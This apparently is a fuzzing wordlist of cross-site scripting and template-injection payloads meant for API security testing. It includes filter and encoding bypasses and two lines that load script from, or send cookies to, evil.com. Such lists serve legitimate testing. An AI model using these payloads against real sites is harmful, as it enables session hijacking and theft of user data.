# XSS (Cross-Site Scripting) Payloads
# For API testing - check if responses reflect these unescaped

# ===== Basic XSS =====
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script src="http://evil.com/xss.js"></script>
<script>new Image().src="http://evil.com/?c="+document.cookie</script>

# ===== Event Handlers =====
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src=1 onerror="alert(1)">
<img/src=x onerror=alert(1)>
<svg onload=alert('XSS')>
<svg/onload=alert(1)>
<body onload=alert('XSS')>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<iframe src="javascript:alert(1)">
<iframe onload=alert(1)>

# ===== HTML Injection =====
<h1>XSS</h1>
<a href="http://evil.com">Click</a>
<a href="javascript:alert(1)">Click</a>
<form action="http://evil.com"><input type="submit"></form>

# ===== Encoding Bypass =====
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)">
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<script>eval(atob('YWxlcnQoMSk='))</script>

# ===== Filter Bypass =====
<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<script>alert(1)//
<script>alert(1)<!--
<script>alert`1`</script>
<script>alert&lpar;1&rpar;</script>
<<script>alert(1)//<</script>
<img """><script>alert(1)</script>">
<img src="x` `<script>alert(1)</script>"` `>

# ===== Attribute Injection =====
" onclick="alert(1)
" onfocus="alert(1)" autofocus="
' onclick='alert(1)
" onmouseover="alert(1)
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>

# ===== JavaScript Protocol =====
javascript:alert(1)
javascript:alert(document.domain)
javascript://comment%0aalert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# ===== Template Injection =====
{{constructor.constructor('alert(1)')()}}
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
{7*7}
${{7*7}}
{{config}}
{{self}}

# ===== JSON Injection =====
{"name":"<script>alert(1)</script>"}
{"name":"test\"><script>alert(1)</script>"}
